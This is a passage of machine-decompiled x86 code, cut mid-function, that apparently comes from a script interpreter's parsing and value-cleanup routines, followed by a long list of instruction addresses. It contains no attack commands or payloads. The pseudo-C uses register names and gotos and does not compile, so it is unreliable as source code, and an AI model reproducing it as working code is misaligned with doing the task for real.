							switch( *((intOrPtr*)(( *_t88 & 0x000000ff) * 4 +  &M0040AEEC))) {
								case 0:
									__eax =  *__eax;
									__eflags = __eax - 4;
									if(__eax < 4) {
										L129:
										__eflags = __eax - 1;
										if(__eax != 1) {
											__eax = __eax - 2;
											__eflags = __eax - 0x27;
											if(__eflags > 0) {
												goto L9;
											}
											__eax =  *(__eax + 0x42bc86) & 0x000000ff;
											switch( *((intOrPtr*)(__eax * 4 +  &M0042BC6E))) {
												case 0:
													__ecx = 1 + __ecx;
													__ebx = 8;
													 *__edi = __ecx;
													goto L10;
												case 1:
													__ecx = 1 + __ecx;
													__ebx = 0xa;
													 *__edi = __ecx;
													goto L10;
												case 2:
													__edi = 0x4a95f0;
													__esi =  &_v128;
													_v108 = 0x16;
													__eax = E0040BC10(0x4a95f0,  &_v128);
													_v72 = 1;
													__edx = _v72;
													_push(__edx);
													goto L170;
												case 3:
													__edi = 0x4a95f0;
													__esi =  &_v128;
													_v108 = 0x16;
													__eax = E0040BC10(0x4a95f0,  &_v128);
													_v80 = 0;
													__ecx = _v80;
													_push(__ecx);
													L170:
													__eax =  &_v128;
													_push(E0040D0B0( &_v128));
													__eax = E004530C9();
													__edi = _a8;
													 *__edi = 1 +  *__edi;
													__esi = _v136;
													goto L4;
												case 4:
													__esp = __esp - 0x10;
													__edi = L"Default";
													__esi = __esp;
													_v108 = 0x16;
													E00401B10(L"Default", __esp, __eflags) =  &_v28;
													_push( &_v28);
													__eax = E0044B8D4();
													__edi = 0x4a95f0;
													__esi =  &_v148;
													__eax = E0040BC10(0x4a95f0, __esi);
													__ecx =  &_v48;
													__esi = E0040D0B0(__esi);
													__eax = _a8;
													 *_a8 = 1 +  *_a8;
													__ecx =  &_v48;
													__eax = E00402250(__ecx);
													__esi = _v156;
													__edi = _a8;
													goto L4;
												case 5:
													goto L9;
											}
										}
										__ecx = 1 + __ecx;
										__ebx = __eax + 6;
										 *__edi = __ecx;
										goto L10;
									}
									__eflags = __eax - 0x27;
									if(__eax < 0x27) {
										goto L9;
									}
									goto L129;
								case 1:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E0040BC10(0x4a95f0,  &_v128);
									__eflags = _v124 - 1;
									if(_v124 != 1) {
										__eflags = _v115;
										if(_v115 == 0) {
											__eax = _v120;
										} else {
											__ecx = _v120;
											__eax =  *(_v120 + 0x10);
										}
									} else {
										__eax = _v128;
									}
									__edx = _a4;
									__ebx = _v112;
									__eax = _a8;
									__eax = E00408CC0(_a8, __ebx, __edx, __fp0, _a8); // executed
									__eflags = __eax;
									if(__eax != 0) {
										goto L285;
									} else {
										__eflags =  *((intOrPtr*)(__ebx + 0xf8)) - 1;
										if( *((intOrPtr*)(__ebx + 0xf8)) == 1) {
											goto L285;
										}
										__esi = _v128;
										__edi = _a8;
										goto L4;
									}
								case 2:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E0040BC10(0x4a95f0, __esi);
									__edi = _a8;
									__edx = _a4;
									__ecx =  *__edi;
									__eax =  *((intOrPtr*)(_a4 + 4));
									__eax =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
									__ecx =  *(__eax + 4);
									__ebx =  *__eax;
									__eax = __esi;
									_v32 = __ecx;
									__esi = E0040D0B0(__esi);
									__eax = E00408F40(__edi, __esi);
									__edx = _v32;
									 *(__esi + 8) = 2;
									 *__esi = __ebx;
									 *(__esi + 4) = __edx;
									 *__edi = 1 +  *__edi;
									__esi = _v128;
									goto L4;
								case 3:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E0040BC10(0x4a95f0, __esi);
									__edi = _a8;
									__ecx = _a4;
									__eax =  *__edi;
									__edx =  *((intOrPtr*)(_a4 + 4));
									__eax =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
									__fp0 =  *( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4));
									__eax = __esi;
									_v136 =  *( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4));
									__esi = E0040D0B0(__esi);
									__eax = E00408F40(__edi, __esi);
									__fp0 = _v136;
									 *__esi = __fp0;
									 *(__esi + 8) = 3;
									 *__edi = 1 +  *__edi;
									__esi = _v128;
									goto L4;
								case 4:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									__eax = E0040BC10(0x4a95f0,  &_v128);
									__esi = _a8;
									__eax =  *__esi;
									__edi = _a4;
									__ecx = __eax + 1;
									 *__esi = __eax + 1;
									__edx =  *(__edi + 4);
									__eax =  *( *(__edi + 4) + __eax * 4);
									__eax =  *__eax;
									__edx =  *__eax;
									__esp = __esp - 0x10;
									 *__esp =  *__eax;
									__edx =  *(__eax + 4);
									_v160 =  *(__eax + 4);
									__edx =  *(__eax + 8);
									_v156 =  *(__eax + 8);
									__eax =  *(__eax + 0xc);
									_v152 = __eax;
									 *__eax = 1 +  *__eax;
									__eax =  &_v128;
									__eax = E0040D0B0( &_v128);
									__ebx = _v112;
									_push(__eax);
									_push(__ebx);
									__eax = E004720DB(__eflags, __fp0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax =  *__esi;
										__ecx =  *(__edi + 4);
										__edx =  *( *(__edi + 4) +  *__esi * 4 - 4);
										 *((short*)( *( *(__edi + 4) +  *__esi * 4 - 4) + 0xa)) = E0045E737(__fp0, __ebx, 0x86,  *((short*)( *( *(__edi + 4) +  *__esi * 4 - 4) + 0xa)));
										L285:
										__ecx =  &_v128;
										_push( &_v128);
										goto L296;
									}
									__esi = _v128;
									__edi = _a8;
									_v108 = 0x16;
									goto L4;
								case 5:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E0040BC10(0x4a95f0,  &_v128);
									__eflags = _v124 - 1;
									if(__eflags != 0) {
										__eflags = _v115;
										if(__eflags != 0) {
											__ecx = _v120;
											__eax =  *(_v120 + 0x10);
										} else {
											__eax = _v120;
										}
									} else {
										__eax = _v128;
									}
									__edx = _a4;
									__eax = _v112;
									__eax = _a8;
									__eax = E0040C1F0(_a8, __eflags, __fp0, _v112, _a4, _a8);
									__eflags = __eax;
									if(__eax != 0) {
										__eax =  &_v128;
										_push( &_v128);
										goto L296;
									} else {
										__esi = _v128;
										__edi = _a8;
										goto L4;
									}
								case 6:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									__eax = E0040BC10(0x4a95f0, __esi);
									__edx =  &_v85;
									__esi = E0040D0B0(__esi);
									__esi = _v112;
									__eax = _a4;
									__eax = _a8;
									__eax = E004096A0(_a8, __eflags, __fp0, __esi, _a4, _a8,  &_v85);
									__eflags = __eax;
									if(__eax != 0) {
										goto L295;
									}
									__eflags =  *((intOrPtr*)(__esi + 0xf8)) - 1;
									if( *((intOrPtr*)(__esi + 0xf8)) == 1) {
										goto L295;
									}
									__esi = _v128;
									__edi = _a8;
									_v108 = 0x16;
									goto L4;
								case 7:
									__eflags = __ecx;
									if(__ecx == 0) {
										L177:
										__esi = _v112;
										__edx = __esi + 0x488;
										__eax = E00432416(__edx);
										__eflags = __al;
										if(__al == 0) {
											__eax = _a4;
											__ecx =  *((intOrPtr*)(_a4 + 4));
											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __esi, 0xa7,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
											__ecx =  &_v140;
											_push( &_v140);
											goto L296;
										}
										__eax = 0;
										__esp = __esp - 0x10;
										_v68 = 0;
										_v56 = 0;
										__eax = __edx;
										__ebx = __esp;
										_v60 = 1;
										__eax = E0040B960(__edx, __ebx, __ecx, __edi);
										__ecx = _a4;
										__eax =  &_v68;
										_push( &_v68);
										_push(__edi);
										_push(_a4);
										__ecx = __esi;
										__eax = E0047E250(__esi, __eflags, __fp0);
										__eflags = __eax;
										if(__eax != 0) {
											__eax = _a4;
											__ecx =  *((intOrPtr*)(_a4 + 4));
											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __esi, 0x6e,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
											__esi =  &_v92;
											goto L294;
										}
										__edi =  &_v80;
										__esi =  &_v140;
										_v120 = 0x16;
										__eax = E0040BC10(__edi,  &_v140);
										__esi = __edi;
										__eax = E00408F40(__edi, __edi);
										__esi = _v140;
										__edi = _a8;
										goto L4;
									}
									__eax =  *(__edx + 8) & 0x0000ffff;
									__eflags = __ax - 0x33;
									if(__ax == 0x33) {
										L175:
										__ebx = _v112;
										__eax = E00451B42(__ebx, 0xa9, 0, L"Variable must be of type \'Object\'.", 1);
										__eflags = __eax;
										if(__eax != 0) {
											__eax = _a4;
											__ecx =  *((intOrPtr*)(_a4 + 4));
											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __ebx, 0xa9,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
											__ecx =  &_v140;
											_push( &_v140);
											goto L296;
										}
										 *__edi = 1 +  *__edi;
										goto L4;
									}
									__eflags = __ax - 0x35;
									if(__ax != 0x35) {
										goto L177;
									}
									goto L175;
								case 8:
									__ecx = 1 + __ecx;
									__ebx = 5;
									 *__edi = __ecx;
									goto L10;
								case 9:
									__ecx = 1 + __ecx;
									__ebx = 1;
									 *__edi = __ecx;
									goto L10;
								case 0xa:
									__ebx = 0;
									__ecx = 1 + __ecx;
									 *__edi = __ecx;
									goto L10;
								case 0xb:
									__ecx = 1 + __ecx;
									__ebx = 4;
									 *__edi = __ecx;
									goto L10;
								case 0xc:
									__ecx = 1 + __ecx;
									__ebx = 3;
									 *__edi = __ecx;
									goto L10;
								case 0xd:
									__ecx = 1 + __ecx;
									__ebx = 2;
									 *__edi = __ecx;
									goto L10;
								case 0xe:
									__ecx = 1 + __ecx;
									__ebx = 0x12;
									 *__edi = __ecx;
									goto L10;
								case 0xf:
									__ecx = 1 + __ecx;
									__ebx = 0x13;
									 *__edi = __ecx;
									goto L10;
								case 0x10:
									__eax = _v108;
									__eflags = __eax - 0x16;
									if(__eax != 0x16) {
										__eflags = __eax - 0x13;
										if(__eax == 0x13) {
											goto L89;
										}
										__ebx = 0x11;
										L90:
										__ecx = 1 + __ecx;
										 *__edi = __ecx;
										goto L10;
									}
									L89:
									__ebx = 0xb;
									goto L90;
								case 0x11:
									__eax = _v108;
									__eflags = __eax - 0x16;
									if(__eax == 0x16) {
										L155:
										__ebx = 0xc;
										L156:
										__ecx = 1 + __ecx;
										 *__edi = __ecx;
										goto L10;
									}
									__ebx = 0x10;
									__eflags = __eax - 0x13;
									if(__eax != 0x13) {
										goto L156;
									}
									goto L155;
								case 0x12:
									__ecx = 1 + __ecx;
									__ebx = 0xe;
									 *__edi = __ecx;
									goto L10;
								case 0x13:
									_t490 = 0xd;
									 *_t559 = 1 + _t508;
									goto L10;
								case 0x14:
									__ecx = 1 + __ecx;
									__ebx = 9;
									 *__edi = __ecx;
									goto L10;
								case 0x15:
									__ecx = 1 + __ecx;
									__ebx = 6;
									 *__edi = __ecx;
									goto L10;
								case 0x16:
									__ecx = 1 + __ecx;
									__ebx = 0xf;
									 *__edi = __ecx;
									L10:
									_v136 = _t490;
									_v108 = _t490;
									do {
										_t509 = _v95;
										_t564 = _v100;
										if(_t509 != 0) {
											_t375 = _t564[1];
										} else {
											_t375 = _t564;
										}
										_t378 =  *( *_t375 * 0x15 + _t490 + 0x4918f0) & 0x000000ff;
										if(_t378 != 3) {
											__eflags = _t378 - 6;
											if(_t378 > 6) {
												L71:
												__eflags = _t490 - 7;
												if(_t490 == 7) {
													L134:
													__eflags = _v124;
													if(_v124 == 0) {
														L73:
														_t563 = _v128;
														while(1) {
															L4:
															_t508 =  *_t559;
															if(_t508 == _a16) {
																goto L9;
															}
															goto L5;
														}
														goto L9;
													}
													E0040B960(E0040D0B0( &_v128),  &_v52, _t509, _t559);
													_t465 = E0040CE70( &_v52);
													__eflags = _t465;
													if(_t465 == 0) {
														L276:
														__eflags = _v136 - 7;
														if(_v136 != 7) {
															L138:
															E00408F40(_t559,  &_v52);
															_t563 = _v128;
															goto L4;
														}
														_t566 = 8;
														L278:
														_t468 = E00441DB4(_a4, _t559);
														__eflags = _t468;
														if(_t468 != 0) {
															E0045E737(_t594, _v112, 0x6e, _v92);
															_t567 =  &_v64;
															L294:
															E00408F40(_t559, _t567);
															L295:
															_push( &_v128);
															L296:
															E0044B92D();
															E004107C0( &_v108);
															_t475 = 1;
															L20:
															return _t475;
														}
														_t476 =  &_v128;
														__eflags = _v136 - _t566;
														if(_v136 != _t566) {
															_v76 = 0;
															_push(_v76);
														} else {
															_v84 = 1;
															_push(_v84);
														}
														_push(E0040D0B0(_t476));
														E004530C9();
														E0040BE70( &_v112);
														goto L138;
													}
													_t566 = 8;
													__eflags = _v136 - 8;
													if(_v136 == 8) {
														goto L278;
													}
													__eflags = _t465;
													if(_t465 == 0) {
														goto L276;
													}
													goto L138;
												}
												__eflags = _t490 - 8;
												if(_t490 == 8) {
													goto L134;
												}
												goto L73;
											}
											switch( *((intOrPtr*)(_t378 * 4 +  &M0040AED0))) {
												case 0:
													__eflags = _t509;
													if(__eflags != 0) {
														 *_t564 = _t490;
														_v95 = 0;
													} else {
														_push(8);
														_t480 = E004115D7(_t559, _t564, __eflags);
														_t575 = _t575 + 4;
														__eflags = _t480;
														if(_t480 == 0) {
															_t480 = 0;
														} else {
															 *_t480 = _t490;
														}
														 *(_t480 + 4) = _t564;
														_v100 = _t480;
													}
													_t85 =  &_v104;
													 *_t85 = _v104 + 1;
													__eflags =  *_t85;
													goto L71;
												case 1:
													goto L84;
												case 2:
													while(1) {
														__edx = _v100;
														__eflags = __cl;
														if(__cl == 0) {
															__eax = __edx;
														} else {
															__eax =  *(__edx + 4);
														}
														__eflags =  *__eax - 0x12;
														if( *__eax == 0x12) {
															break;
														}
														__eflags = __cl;
														if(__cl == 0) {
															__eax = __edx;
														} else {
															__eax =  *(__edx + 4);
														}
														__eflags =  *__eax - 0x14;
														if( *__eax == 0x14) {
															goto L290;
														} else {
															__edx =  &_v128;
															__eax =  &_v104;
															__eax = E0040B5F0( &_v104, __fp0,  &_v128);
															__eflags = __eax;
															if(__eax != 0) {
																goto L289;
															} else {
																__cl = _v95;
																continue;
															}
														}
													}
													__esi =  &_v104;
													__eax = E0040BE70(__esi);
													goto L71;
												case 3:
													goto L71;
												case 4:
													__eax = _v92;
													__ecx = _v112;
													__eax = E0045E737(__fp0, _v112, 0x6b, _v92);
													goto L295;
												case 5:
													__eax = _v92;
													__ecx = _v112;
													__eax = E0045E737(__fp0, _v112, 0x6c, _v92);
													goto L295;
												case 6:
													L290:
													__eax = _v92;
													__ecx = _v112;
													__eax = E0045E737(__fp0, _v112, 0x6d, _v92);
													goto L295;
											}
										}
										if(_v124 != 1) {
											break;
										}
										_t483 = _v120;
										if(_t483 != 0) {
											_t570 = _t483;
											do {
												_t561 =  *(_t570 + 0x10);
												E00408F40(_t561, _t570);
												_push(_t570);
												E004111DC();
												_t575 = _t575 + 4;
												_t570 = _t561;
												__eflags = _t561;
											} while (_t561 != 0);
										}
										_t486 = _v100;
										if(_t486 == 0) {
											L19:
											_t475 = 0;
											goto L20;
										} else {
											do {
												_t571 =  *(_t486 + 4);
												_push(_t486);
												E004111DC();
												_t575 = _t575 + 4;
												_t486 = _t571;
											} while (_t571 != 0);
											goto L19;
										}
										L84:
										__ecx =  &_v128;
										__eax =  &_v104;
										__eax = E0040B5F0( &_v104, __fp0,  &_v128);
										__eflags = __eax;
									} while (__eax == 0);
									L289:
									E0045E737(_t594, _v112, 0x6e, _v92);
									goto L295;
								case 0x17:
									goto L9;
							}
						}
						_t499 = _v124;
						_v108 = 0x16;
						__eflags = _t499;
						if(_t499 != 0) {
							__eflags = _v115;
							if(__eflags != 0) {
								E00408E80(_v120, _t508, 0x4a95f0);
								_t499 = _v128;
								_v119 = 0;
							} else {
								_push(0x18);
								_t442 = E004115D7(_t559, _t563, __eflags);
								_t575 = _t575 + 4;
								__eflags = _t442;
								if(_t442 == 0) {
									_t443 = 0;
								} else {
									_v136 = _t442;
									_t503 = _v136;
									E0040B960(0x4a95f0, _t503, _t508, _t559);
									_t443 = _t503;
									_t499 = _v124;
								}
								 *((intOrPtr*)(_t443 + 0x10)) = _v120;
								_v120 = _t443;
							}
							L55:
							_t427 =  *( *(_a4 + 4) +  *_t559 * 4);
							_t501 = _t499 + 1;
							_v124 = _t501;
							__eflags = _t501 - 1;
							if(_t501 != 1) {
								__eflags = _v115;
								if(_v115 != 0) {
									_t502 =  *(_v120 + 0x10);
								} else {
									_t502 = _v120;
								}
							} else {
								_t502 = _t563;
							}
							_t531 =  *_t427;
							_t428 = _t502[3];
							_v136 = _t531;
							__eflags = _t428;
							if(_t428 != 0) {
								E004431AD(_t428);
								_t531 = _v140;
								_t502[3] = 0;
							}
							_t430 = _t502[2];
							__eflags = _t430 - 8;
							if(_t430 == 8) {
								_t551 =  *_t502;
								__eflags = _t551;
								if(_t551 == 0) {
									goto L59;
								}
								__imp__#9(_t551);
								_push( *_t502);
								E004111DC();
								_t531 = _v140;
								_t575 = _t575 + 4;
								goto L63;
							} else {
								L59:
								__eflags = _t430 - 0xa;
								if(_t430 == 0xa) {
									_t431 =  *_t502;
									__eflags = _t431;
									if(_t431 != 0) {
										E0044318E(_t431);
										_t531 = _v140;
									}
								} else {
									__eflags = _t430 - 5;
									if(_t430 == 5) {
										E0040E270(_t502, _t563);
										_t531 = _v136;
									} else {
										__eflags = _t430 - 0xb;
										if(_t430 == 0xb) {
											_push( *((intOrPtr*)( *_t502 + 4)));
											E004111DC();
											_push( *_t502);
											E004111DC();
											_t531 = _v136;
											_t575 = _t575 + 8;
										} else {
											__eflags = _t430 - 0xc;
											if(_t430 == 0xc) {
												_t438 =  *_t502;
												__eflags = _t438;
												if(_t438 != 0) {
													E0044B3D9(_t438);
													_t531 = _v140;
												}
											}
										}
									}
								}
								L63:
								_t502[2] = 1;
								 *_t502 = _t531;
								 *_t559 = 1 +  *_t559;
								continue;
							}
						}
						__eflags = _t563 - 0x4a95f0;
						if(_t563 == 0x4a95f0) {
							goto L55;
						}
						_t446 =  *(_t563 + 0xc);
						__eflags = _t446;
						if(_t446 != 0) {
							E004431AD(_t446);
							 *(_t563 + 0xc) = 0;
						}
						_t448 =  *(_t563 + 8);
						__eflags = _t448 - 8;
						if(_t448 == 8) {
							_t534 =  *_t563;
							__eflags = _t534;
							if(_t534 == 0) {
								goto L49;
							}
							__imp__#9(_t534);
							_push( *_t563);
							E004111DC();
							_t575 = _t575 + 4;
							goto L53;
						} else {
							L49:
							__eflags = _t448 - 0xa;
							if(_t448 == 0xa) {
								_t449 =  *_t563;
								__eflags = _t449;
								if(_t449 != 0) {
									E0044318E(_t449);
								}
							} else {
								__eflags = _t448 - 5;
								if(_t448 == 5) {
									E0040E270(_t563, _t563);
								} else {
									__eflags = _t448 - 0xb;
									if(_t448 == 0xb) {
										_push( *((intOrPtr*)( *_t563 + 4)));
										E004111DC();
										_push( *_t563);
										E004111DC();
										_t575 = _t575 + 8;
									} else {
										__eflags = _t448 - 0xc;
										if(_t448 == 0xc) {
											_t459 =  *_t563;
											__eflags = _t459;
											if(_t459 != 0) {
												E0044B3D9(_t459);
											}
										}
									}
								}
							}
							L53:
							 *(_t563 + 8) = 1;
							 *_t563 = 0;
							_t450 =  *0x4a95f8; // 0x1
							 *(_t563 + 8) = _t450;
							_t451 =  *0x4a95f8; // 0x1
							__eflags = _t451 - 1;
							if(_t451 != 1) {
								_t452 = _t451 - 1;
								__eflags = _t452 - 0xb;
								if(__eflags > 0) {
									goto L55;
								}
								switch( *((intOrPtr*)(_t452 * 4 +  &M0042BCAE))) {
									case 0:
										goto L54;
									case 1:
										 *_t563 =  *0x4a95f0;
										_t553 =  *0x4a95f4; // 0x0
										 *((intOrPtr*)(_t563 + 4)) = _t553;
										goto L55;
									case 2:
										__fp0 =  *0x4a95f0;
										 *__esi = __fp0;
										goto L55;
									case 3:
										_push(0x10);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = 0;
											 *(__esi + 0xc) = 0;
										} else {
											__ecx =  *0x4a95fc; // 0x0
											__edx =  *__ecx;
											 *__eax =  *__ecx;
											__edx =  *(__ecx + 4);
											 *(__eax + 4) =  *(__ecx + 4);
											__edx =  *(__ecx + 8);
											 *(__eax + 8) = __edx;
											__ecx =  *(__ecx + 0xc);
											 *(__eax + 0xc) = __ecx;
											 *__ecx = 1 +  *__ecx;
											 *(__esi + 0xc) = __eax;
										}
										goto L55;
									case 4:
										_push(0x214);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = 0;
											__eflags = 0;
										} else {
											__esi =  *0x4a95f0; // 0x0
											__ebx = _v124;
											__ecx = 0x85;
											__edi = __eax;
											__eax = memcpy(__eax, __esi, 0x85 << 2);
											__esi + __ecx = __esi + __ecx + __ecx;
											__ecx = 0;
											__esi = _v128;
											__edi = _a8;
										}
										 *__esi = __eax;
										__eflags =  *(__eax + 4);
										if( *(__eax + 4) != 0) {
											__eax =  *(__eax + 4);
											 *__eax = 1 +  *__eax;
										}
										goto L55;
									case 5:
										__eax =  *0x4a95f0;
										 *__esi = __eax;
										goto L55;
									case 6:
										__ecx =  *0x4a95f0;
										 *__esi = __ecx;
										goto L55;
									case 7:
										__eflags =  *0x4a95f0;
										if(__eflags != 0) {
											_push(0x10);
											__eax = E004115D7(__edi, __esi, __eflags);
											__esp = __esp + 4;
											_push(__eax);
											 *__esi = __eax;
											__imp__#8();
											__edx =  *0x4a95f0; // 0x0
											__eax =  *__esi;
											_push(__edx);
											_push(__eax);
											__imp__#10();
											__eflags = __eax;
											if(__eax < 0) {
												__ecx =  *__esi;
												_push( *__esi);
												__imp__#9();
												__edx =  *__esi;
												_push(__edx);
												__eax = E004111DC();
												__esp = __esp + 4;
												 *__esi = 0;
											}
										}
										goto L55;
									case 8:
										__al =  *0x4a95f0;
										 *__esi = __al;
										goto L55;
									case 9:
										_push(0x18);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											goto L209;
										}
										__ecx =  *0x4a95f0; // 0x0
										__eax = E0044B8A3(__eax, __ecx);
										 *__esi = __eax;
										goto L55;
									case 0xa:
										_push(8);
										__eax = E004115D7(__edi, __esi, __eflags);
										 *__esi = __eax;
										__edx =  *0x4a95f0; // 0x0
										__ecx =  *__edx;
										 *__eax =  *__edx;
										__edx =  *__esi;
										__eax =  *( *__esi);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eflags == 0) {
											_push(1);
											__eax = E004115D7(__edi, __esi, __eflags);
											__ecx =  *__esi;
											 *(__ecx + 4) = __eax;
											__edx =  *__esi;
											__eax =  *(__edx + 4);
											__esp = __esp + 4;
											 *__eax = 0;
										} else {
											_push(__eax);
											__eax = E004115D7(__edi, __esi, __eflags);
											__ecx =  *__esi;
											 *( *__esi + 4) = __eax;
											__eax =  *__esi;
											__edx =  *__eax;
											__ecx =  *0x4a95f0; // 0x0
											__eax =  *(__eax + 4);
											__esp = __esp + 4;
											__edx =  *(__ecx + 4);
											__eax = E00410E60(__eax,  *(__ecx + 4),  *(__ecx + 4));
										}
										goto L55;
									case 0xb:
										_push(0x14);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											L209:
											__eax = 0;
											 *__esi = 0;
											goto L55;
										}
										__ecx =  *0x4a95f0; // 0x0
										__eax = E00470870(__eax, __ecx);
										 *__esi = __eax;
										goto L55;
								}
							}
							L54:
							_t554 =  *0x4a95f0; // 0x0
							 *_t563 = _t554;
							goto L55;
						}
					}
					L9:
					_t490 = 0x14;
					goto L10;
				}
			}































































































                                  0x0040a780
                                  0x0040a786
                                  0x0040a796
                                  0x0040a79a
                                  0x0040a7a0
                                  0x0040ae8c
                                  0x0040ae97
                                  0x0040ae9d
                                  0x0040aea3
                                  0x0040aea9
                                  0x0040aeae
                                  0x0040aeae
                                  0x0040a7a6
                                  0x0040a7a9
                                  0x0040a7ab
                                  0x0040a7b0
                                  0x0040a7b4
                                  0x0040a7b8
                                  0x0040a7bc
                                  0x0040a7c1
                                  0x0040a7c6
                                  0x0040a7cb
                                  0x0042b072
                                  0x0040a7d1
                                  0x0040a7d1
                                  0x0040a7d1
                                  0x0040a7da
                                  0x0040a7dd
                                  0x0040a7e3
                                  0x0040a7f0
                                  0x0040a7f4
                                  0x0040a7fc
                                  0x0040a800
                                  0x0040a800
                                  0x0040a800
                                  0x0040a805
                                  0x00000000
                                  0x00000000
                                  0x0040a807
                                  0x0040a810
                                  0x0040a817
                                  0x00000000
                                  0x00000000
                                  0x0040a819
                                  0x0040a820
                                  0x0040a8ad
                                  0x0040a8b1
                                  0x0040a8b9
                                  0x0040a8bb
                                  0x0040ac4a
                                  0x0040ac4f
                                  0x0040ad54
                                  0x0040ad56
                                  0x0040ad5b
                                  0x0040ad5e
                                  0x0040ad60
                                  0x0042b9fa
                                  0x0040ad66
                                  0x0040ad66
                                  0x0040ad6a
                                  0x0040ad73
                                  0x0040ad78
                                  0x0040ad7a
                                  0x0040ad7a
                                  0x0040ad82
                                  0x0040ad85
                                  0x0040ac55
                                  0x0040ac5e
                                  0x0040ac63
                                  0x0040ac67
                                  0x0040ac67
                                  0x0040a930
                                  0x0040a938
                                  0x0040a93b
                                  0x0040a93c
                                  0x0040a940
                                  0x0040a943
                                  0x0040ac71
                                  0x0040ac76
                                  0x0040ac7a
                                  0x0042ba04
                                  0x0040ac80
                                  0x0040ac80
                                  0x0040ac80
                                  0x0040a949
                                  0x0040a949
                                  0x0040a949
                                  0x0040a94d
                                  0x0040a951
                                  0x0040a953
                                  0x0040a956
                                  0x0040a958
                                  0x0042ba0e
                                  0x0042ba13
                                  0x0042ba17
                                  0x0042ba17
                                  0x0040a95e
                                  0x0040a961
                                  0x0040a964
                                  0x0042ba23
                                  0x0042ba25
                                  0x0042ba27
                                  0x00000000
                                  0x00000000
                                  0x0042ba2e
                                  0x0042ba38
                                  0x0042ba3a
                                  0x0042ba3b
                                  0x0042ba40
                                  0x00000000
                                  0x0040a96a
                                  0x0040a96a
                                  0x0040a96a
                                  0x0040a96d
                                  0x0042ba48
                                  0x0042ba4a
                                  0x0042ba4c
                                  0x0042ba53
                                  0x0042ba53
                                  0x0040a973
                                  0x0040a973
                                  0x0040a976
                                  0x0042ba61
                                  0x0040a97c
                                  0x0040a97c
                                  0x0040a97f
                                  0x0042ba6f
                                  0x0042ba71
                                  0x0042ba74
                                  0x0042ba75
                                  0x0042ba83
                                  0x0042ba84
                                  0x0042ba89
                                  0x0040a985
                                  0x0040a985
                                  0x0040a988
                                  0x0042ba91
                                  0x0042ba93
                                  0x0042ba95
                                  0x0042ba9c
                                  0x0042ba9c
                                  0x0042ba95
                                  0x0040a988
                                  0x0040a97f
                                  0x0040a976
                                  0x0040a98e
                                  0x0040a98e
                                  0x0040a992
                                  0x0040a994
                                  0x0040a99a
                                  0x0040a9a1
                                  0x0040a9a6
                                  0x0040a9a9
                                  0x0040a9ab
                                  0x0042baa6
                                  0x0040a9b1
                                  0x0040a9b3
                                  0x0040a9b8
                                  0x0040a9bb
                                  0x0040a9be
                                  0x0040a9c1
                                  0x0040a9c4
                                  0x0040a9c7
                                  0x0040a9c7
                                  0x0040a9c7
                                  0x0040a9cd
                                  0x0040a9d0
                                  0x0040a9d4
                                  0x0040a9d6
                                  0x0040a9dd
                                  0x0042bab7
                                  0x0042babc
                                  0x0042babc
                                  0x0040a9e3
                                  0x0040a9ea
                                  0x0042bad4
                                  0x0042bad4
                                  0x0040a800
                                  0x0040a800
                                  0x0040a800
                                  0x0040a805
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a805
                                  0x0040a800
                                  0x0040a964
                                  0x0040a8c1
                                  0x0040a8c7
                                  0x00000000
                                  0x00000000
                                  0x0040a8c9
                                  0x0040a8cc
                                  0x0040a8ce
                                  0x0042b776
                                  0x0042b77b
                                  0x0042b77b
                                  0x0040a8d4
                                  0x0040a8d7
                                  0x0040a8da
                                  0x0042b787
                                  0x0042b789
                                  0x0042b78b
                                  0x00000000
                                  0x00000000
                                  0x0042b792
                                  0x0042b79a
                                  0x0042b79b
                                  0x0042b7a0
                                  0x00000000
                                  0x0040a8e0
                                  0x0040a8e0
                                  0x0040a8e0
                                  0x0040a8e3
                                  0x0042b7a8
                                  0x0042b7aa
                                  0x0042b7ac
                                  0x0042b7b3
                                  0x0042b7b3
                                  0x0040a8e9
                                  0x0040a8e9
                                  0x0040a8ec
                                  0x0042b7bf
                                  0x0040a8f2
                                  0x0040a8f2
                                  0x0040a8f5
                                  0x0042b7ce
                                  0x0042b7cf
                                  0x0042b7d9
                                  0x0042b7da
                                  0x0042b7df
                                  0x0040a8fb
                                  0x0040a8fb
                                  0x0040a8fe
                                  0x0042b7e7
                                  0x0042b7e9
                                  0x0042b7eb
                                  0x0042b7f2
                                  0x0042b7f2
                                  0x0042b7eb
                                  0x0040a8fe
                                  0x0040a8f5
                                  0x0040a8ec
                                  0x0040a904
